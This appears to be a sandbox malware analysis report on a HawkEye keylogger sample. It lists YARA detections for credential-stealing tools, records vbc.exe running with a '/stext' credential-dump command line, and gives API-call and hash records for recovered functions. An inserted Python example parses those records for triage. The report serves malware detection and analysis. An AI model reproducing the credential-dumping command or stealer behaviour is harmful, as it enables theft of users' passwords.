                                                                                                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000007.00000003.278922139.0000000004A65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000003.278922139.0000000004A65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:17:09:07
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp'
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1171592 bytes
                                                                                                                                                                MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:17:10:10
                                                                                                                                                                Start date:13/10/2021
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp'
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1171592 bytes
                                                                                                                                                                MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis


Executed Functions

                                                                                                                                                                  • Instruction ID: cc623be289c8476cc0510e4756d72de435f9972e105e9792792830682a0bc018
                                                                                                                                                                  • Opcode Fuzzy Hash: 1548f7062917456d4dd681ad48c9ad87485c362800ff692ec96519e402de5094
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D5158B090064A8FDB14CFA9D588BDEBFF4BF49314F148469E809A7360DB34A885CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 058C4668
                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 058C46A5
                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 058C46E2
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 058C473B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                  • Opcode ID: 7c1b4330f70e43fa0d7f63ef33850d76271994eace54ab879630fb1279c7a2da
                                                                                                                                                                  • Instruction ID: 6aef993690213097307b8510e21e5c633d7f36ad46183ad95a8fa66f9d302925
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c1b4330f70e43fa0d7f63ef33850d76271994eace54ab879630fb1279c7a2da
                                                                                                                                                                  • Instruction Fuzzy Hash: EF5158B090064A8FDB14CFA9D548BDEBFF4BF49314F148469E809A7350CB34A884CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7c059fcf8722399b269d490aa1f0de07c6b1d958b22895e42fbe40d6ab94e724
                                                                                                                                                                  • Instruction ID: 2fba3a908599217d76965e3e6474648b4cfc8bb7c16fc5c96917204f77d98b9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c059fcf8722399b269d490aa1f0de07c6b1d958b22895e42fbe40d6ab94e724
                                                                                                                                                                  • Instruction Fuzzy Hash: E6C13670D09359DFCB12CFA4C880ACDBFB1BF0A300F19909AE448AB222D734A995CF15
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(?), ref: 058C243A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: e3969a72b3fb8400a920987129dcb9dd9d9cafcc84c340da2c70378866f1f1c1
                                                                                                                                                                  • Instruction ID: 52a02b762328bea5d1624861c404b192101356247ccdb762ebdea92fc36d3921
                                                                                                                                                                  • Opcode Fuzzy Hash: e3969a72b3fb8400a920987129dcb9dd9d9cafcc84c340da2c70378866f1f1c1
                                                                                                                                                                  • Instruction Fuzzy Hash: 0691F474A007098FDB24DF69D584A9ABBF6BF48304F00896ED886E7B90D734E945CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 058C8F99
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                  • Opcode ID: 72bc4fcdbf9dfa4c73706b1abf95a56ef3f3fe3d2706a957b3167ce75980196a
                                                                                                                                                                  • Instruction ID: d10838d146c6e0fec1d15963bfff71c27a5df926efc9f9fe5a5222195541de20
                                                                                                                                                                  • Opcode Fuzzy Hash: 72bc4fcdbf9dfa4c73706b1abf95a56ef3f3fe3d2706a957b3167ce75980196a
                                                                                                                                                                  • Instruction Fuzzy Hash: 36717AB4D04218DFDF20CFA9D984BDEBBB1BF09304F1491AAE908A7211D774AA85CF55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019AE189
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Create
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                  • Opcode ID: 8f91dd995d5f8e034115fd5f4af1aa66a72d466e6169a89e2013061a43c8d890
                                                                                                                                                                  • Instruction ID: 9e2d7885ce78324af7fb7530038bf97f31df6f2f3e38011970fc6f7cd7db5dd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f91dd995d5f8e034115fd5f4af1aa66a72d466e6169a89e2013061a43c8d890
                                                                                                                                                                  • Instruction Fuzzy Hash: 7551E475D0022CCFDB24DFA5C884BDEBBB9BF49304F5084A9D509AB250DB716A89CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 058C918E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1378638983-0
                                                                                                                                                                  • Opcode ID: 122cca36cda8dd88f937d0bc5222e9ef8f82a08f723874c3c43089edf003f0ae
                                                                                                                                                                  • Instruction ID: 40545837fbfdd1ae401668e6b358b3483689197ed2a0f7a13afb73ba3f9edac8
                                                                                                                                                                  • Opcode Fuzzy Hash: 122cca36cda8dd88f937d0bc5222e9ef8f82a08f723874c3c43089edf003f0ae
                                                                                                                                                                  • Instruction Fuzzy Hash: D341DCB5D01248EFCB11CFA9E984ADDBBF5BF09310F1484AAE804AB211D335A955CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 058C4D03
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                  • Opcode ID: 0d37ed1ddb367602113eb61d5ce92940d729ead514ef77d520d76ce5a212637e
                                                                                                                                                                  • Instruction ID: 325ac2a6e885c811ef5effbf368c3cff93964e49e5764c6c8bd8d1897b2eab77
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d37ed1ddb367602113eb61d5ce92940d729ead514ef77d520d76ce5a212637e
                                                                                                                                                                  • Instruction Fuzzy Hash: 924156B9D002589FCF00CFA9D984ADEBBF5BB09320F14906AE919BB311D335A995CF54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 058C4D03
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                  • Opcode ID: b7ffe10b928f62423cbe05fe1a6bc121fff73e4d8f1ada17c6456760cb37fa2d
                                                                                                                                                                  • Instruction ID: 87bee45bcd0022b0c5846fc3d1b0a6e12800dba5bbe2fa7ae1686bd0c8d02050
                                                                                                                                                                  • Opcode Fuzzy Hash: b7ffe10b928f62423cbe05fe1a6bc121fff73e4d8f1ada17c6456760cb37fa2d
                                                                                                                                                                  • Instruction Fuzzy Hash: 974165B9D002589FCF00CFA9D984AEEBBF5BB09310F14906AE919BB310D335A995CF54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(?,?,?), ref: 058C2762
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  • Opcode ID: ab67fe2c0292c98a7932a310276104cb9eb1b80fb818dae1929c20ff795c0654
                                                                                                                                                                  • Instruction ID: 0ae80732cbfd7c4987734a741199c5aebf76b810de26f5ba5b51e5dec93586ff
                                                                                                                                                                  • Opcode Fuzzy Hash: ab67fe2c0292c98a7932a310276104cb9eb1b80fb818dae1929c20ff795c0654
                                                                                                                                                                  • Instruction Fuzzy Hash: C54176B8D04258DFCB10CFA9D484A9EFBF5BB49314F14906AE819BB210D374A946CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 058CB601
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                                                  • Opcode ID: bacb20128b7c5c3de709f40f9115ec473e28c2c1e7cbb500077980ca14552f07
                                                                                                                                                                  • Instruction ID: 2659c829b395b7dda7c779606e2f3037e2bf3e1faa60a19963b07d0c4509932d
                                                                                                                                                                  • Opcode Fuzzy Hash: bacb20128b7c5c3de709f40f9115ec473e28c2c1e7cbb500077980ca14552f07
                                                                                                                                                                  • Instruction Fuzzy Hash: FE4108B4900709CFDB14CF99C489AAABBF5FB88314F14849DE919AB321D775E845CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 019A831F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                  • Opcode ID: 6f779a77e2c785c453db2865468d34b5dbb2c3c8d6e4f4e8cce616edd462f30f
                                                                                                                                                                  • Instruction ID: dcb5eb6d32028972d91e0225b1e1df81853e3c60f9121388dcbd938dce915d75
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f779a77e2c785c453db2865468d34b5dbb2c3c8d6e4f4e8cce616edd462f30f
                                                                                                                                                                  • Instruction Fuzzy Hash: 703188B9D002589FCB14CFA9E484AEEFBB5BB19310F14902AE819B7210D774A985CF64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(?,?,?), ref: 058C2762
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  • Opcode ID: 128fbc12426e668a4e6b9f9014441f72b41681c6d264703b29f2553042095ca4
                                                                                                                                                                  • Instruction ID: 0278dae922646eb6bcd93261ea5868c2471366e3ca82b18c8563c560a2cbbf73
                                                                                                                                                                  • Opcode Fuzzy Hash: 128fbc12426e668a4e6b9f9014441f72b41681c6d264703b29f2553042095ca4
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F4176B8D00258DFCB10CFA9D884A9EFBF5BB49310F14906AE819BB220D374A946CF54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 019A831F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                  • Opcode ID: 61456e454b180059617e7ed4907450e0827929480ed29b4584e029d8405b0b31
                                                                                                                                                                  • Instruction ID: 9e3b82bcac4e43b231fba5174bb9050ce27ea5f23d618c40e3d8d0399b1a8f6a
                                                                                                                                                                  • Opcode Fuzzy Hash: 61456e454b180059617e7ed4907450e0827929480ed29b4584e029d8405b0b31
                                                                                                                                                                  • Instruction Fuzzy Hash: B03198B9D002589FCB10CFA9D484ADEFBB5BB19310F14902AE819B7210D774A945CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(?), ref: 058C243A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                  • Opcode ID: 5ee9f72a9e79f6cddd4f65072310f0b2f597c5d211ca0ca24c7f5dfa03f29c42
                                                                                                                                                                  • Instruction ID: 39806f08fa191660f9a63fc3955f2e3fc33d530b512e817799100aabbaa21955
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ee9f72a9e79f6cddd4f65072310f0b2f597c5d211ca0ca24c7f5dfa03f29c42
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E31AAB8D002199FCB14CFA9D484ADEFBF5BB49314F14806AE819B7350D334A946CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowLongW.USER32(?,?,?), ref: 058C918E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1378638983-0
                                                                                                                                                                  • Opcode ID: ec09d3e105aae8cea1256a62735cda8f4406db6e149c8e847055b40742576d3c
                                                                                                                                                                  • Instruction ID: a63837fe7422dd6d104bdb0afda84e5149b9971e20822fca58e30718b61e4084
                                                                                                                                                                  • Opcode Fuzzy Hash: ec09d3e105aae8cea1256a62735cda8f4406db6e149c8e847055b40742576d3c
                                                                                                                                                                  • Instruction Fuzzy Hash: C33185B9D01218DFCB10CF99D984ADEBBF5BB09310F14946AE819B7310D375A945CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.284706163.000000000190D000.00000040.00000001.sdmp, Offset: 0190D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3940f8dd68f6b8fff3afb1592bd45700876e8662c5747e1c8fb0ac4ea0c96b6e
                                                                                                                                                                  • Instruction ID: 198ce365977e371e09f38e04188c8f00a2abbdaa107e7df2cf2dfaebc7eb9e08
                                                                                                                                                                  • Opcode Fuzzy Hash: 3940f8dd68f6b8fff3afb1592bd45700876e8662c5747e1c8fb0ac4ea0c96b6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 5121F271504204EFDB06DFD8D9C0F26BBA9FB84324F24C9A9E80D4B286C336D856CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.284706163.000000000190D000.00000040.00000001.sdmp, Offset: 0190D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2136c6ab4d80a80a80166bf99e35ba9db35594ca3a8d27c0c80b7a3d20cfb209
                                                                                                                                                                  • Instruction ID: 91aa3939814e26ef51d9cd7f932dbe1feb58ffc0ad7b8bec7e77dd33b4a68570
                                                                                                                                                                  • Opcode Fuzzy Hash: 2136c6ab4d80a80a80166bf99e35ba9db35594ca3a8d27c0c80b7a3d20cfb209
                                                                                                                                                                  • Instruction Fuzzy Hash: C521CF75604244DFDB16CF94D8C4B26BBA9FB84364F24C969E84E4B286C336D847CA61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.284706163.000000000190D000.00000040.00000001.sdmp, Offset: 0190D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
                                                                                                                                                                  • Instruction ID: 058016922e0b1b2233981a9931587ad4d60b8312fcbbb1b03489075ce5528b11
                                                                                                                                                                  • Opcode Fuzzy Hash: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
                                                                                                                                                                  • Instruction Fuzzy Hash: 04118E75504280DFDB12CF54D5D4B15BBB2FB44324F24C6A9D84D4B696C33AD44ACB62
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.284706163.000000000190D000.00000040.00000001.sdmp, Offset: 0190D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
                                                                                                                                                                  • Instruction ID: 1800c10e8bcb654b5c39730aff196f81aad47ff4d3454eeb2329031146929b3c
                                                                                                                                                                  • Opcode Fuzzy Hash: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
                                                                                                                                                                  • Instruction Fuzzy Hash: EE118B76504280DFDB12CF98D5C4B15BBA1FB84324F28C6A9D8494B696C33AD45ACB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
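
The records above describe one recovered function each: the Win32 APIs it calls, the memory dump it was carved from, and its opcode and instruction hashes. They are easier to triage once parsed into per-dump API sets, because the question a responder actually asks is "which region of memory resolves imports by hand and rewrites page permissions". The Python below is an added example and is not part of this report or of Joe Sandbox; it parses a constructed excerpt of the listing above, groups API calls by dump offset, and flags the dump at 058C0000 for run-time import resolution (GetModuleHandleW together with LoadLibraryExW) and the dump at 019A0000 for VirtualProtect on memory that the report says is not backed by a PE file. The two flags are this example's own heuristics rather than anything the report states, and parse_records, apis_by_dump and flag_dumps are its own names.

```python
"""Parse the per-function records of a Joe Sandbox 'Similarity' listing.
Added example, not part of the report: the function names below are its own."""
import re
from collections import defaultdict

# Constructed excerpt of the listing above: indentation, the 'Uniqueness'
# heading, blank lines and the Fuzzy Hash lines were dropped for brevity
# (the parser skips them in the full layout anyway).
SAMPLE = """\
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 019A831F
Memory Dump Source
• Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 6f779a77e2c785c453db2865468d34b5dbb2c3c8d6e4f4e8cce616edd462f30f
• Instruction ID: dcb5eb6d32028972d91e0225b1e1df81853e3c60f9121388dcbd938dce915d75
Uniqueness Score: -1.00%
APIs
• LoadLibraryExW.KERNELBASE(?,?,?), ref: 058C2762
Memory Dump Source
• Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 128fbc12426e668a4e6b9f9014441f72b41681c6d264703b29f2553042095ca4
• Instruction ID: 0278dae922646eb6bcd93261ea5868c2471366e3ca82b18c8563c560a2cbbf73
Uniqueness Score: -1.00%
APIs
• GetModuleHandleW.KERNELBASE(?), ref: 058C243A
Memory Dump Source
• Source File: 00000000.00000002.291607749.00000000058C0000.00000040.00000001.sdmp, Offset: 058C0000, based on PE: false
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 5ee9f72a9e79f6cddd4f65072310f0b2f597c5d211ca0ca24c7f5dfa03f29c42
• Instruction ID: 39806f08fa191660f9a63fc3955f2e3fc33d530b512e817799100aabbaa21955
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000000.00000002.284706163.000000000190D000.00000040.00000001.sdmp, Offset: 0190D000, based on PE: false
Similarity
• API ID:
• Opcode ID: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
• Instruction ID: 058016922e0b1b2233981a9931587ad4d60b8312fcbbb1b03489075ce5528b11
Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")

def parse_records(text):
    """One dict per function; a record closes at its 'Uniqueness Score' line."""
    records, cur, section = [], {"apis": [], "fields": {}}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if line.startswith("Uniqueness Score:"):
            cur["uniqueness"] = float(line.split(":", 1)[1].strip().rstrip("%"))
            records.append(cur)
            cur, section = {"apis": [], "fields": {}}, None
        elif not line.startswith("•"):
            section = line  # APIs / Memory Dump Source / Similarity / Strings
        elif section == "APIs" and (m := API_RE.match(line)):
            cur["apis"].append({"name": m[1], "module": m[2], "ref": m[4]})
        elif (m := SRC_RE.match(line)):
            cur["source"], cur["offset"], cur["based_on_pe"] = m[1], m[2], m[3] == "true"
        else:
            key, _, value = line[1:].partition(":")
            cur["fields"][key.strip()] = value.strip()
    return records

def apis_by_dump(records):
    """Dump offset -> set of Win32 API names called from code in that dump."""
    out = defaultdict(set)
    for r in records:
        out[r["offset"]].update(a["name"] for a in r["apis"])
    return {k: v for k, v in out.items() if v}

# Heuristics (this example's assumption, not a verdict the report states):
# GetModuleHandleW + LoadLibraryExW from one dump = imports resolved at run
# time; VirtualProtect from a dump not backed by a PE file = code changing
# page rights on memory it wrote itself, as an unpacking stub does.
def flag_dumps(records):
    pe_backed = {r["offset"]: r["based_on_pe"] for r in records}
    flags = {}
    for offset, names in apis_by_dump(records).items():
        hits = []
        if {"GetModuleHandleW", "LoadLibraryExW"} <= names:
            hits.append("runtime-import-resolution")
        if "VirtualProtect" in names and not pe_backed.get(offset, True):
            hits.append("page-rights-change")
        if hits:
            flags[offset] = hits
    return flags
```

Run stand-alone, flag_dumps(parse_records(SAMPLE)) returns {'019A0000': ['page-rights-change'], '058C0000': ['runtime-import-resolution']}. The same field access covers the other comparison worth making in this listing: the two 0190D000 records above share Opcode ID 66c17bff… while their Instruction IDs and Instruction Fuzzy Hashes differ, so grouping parsed records by fields["Opcode ID"] collects functions the report's opcode hashing treats as the same code even though the full instruction hashes do not, which is the granularity to use when matching a dump against functions from a known family. The regexes key on the leading "•" bullets, so feed the parser text copied from the report rather than a re-typed version.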

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: H"N$H"NWy~L
                                                                                                                                                                  • API String ID: 0-3495486413
                                                                                                                                                                  • Opcode ID: 5ae529f76a5fcd5e9757f21d6d38b05cab8d7f4adb8b97c4ceb5c7834e9db144
                                                                                                                                                                  • Instruction ID: f97def11daa2305a01faa3cae1c72fded979c32b3b2a18e7904fdf33acc9d73f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ae529f76a5fcd5e9757f21d6d38b05cab8d7f4adb8b97c4ceb5c7834e9db144
                                                                                                                                                                  • Instruction Fuzzy Hash: 12610274E05219CFDB04CFA9D5809EEFBF2FB89210F65942AD419B7224D3309A46CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.285037104.00000000019A0000.00000040.00000001.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $L8V
                                                                                                                                                                  • API String ID: 0-3791903723
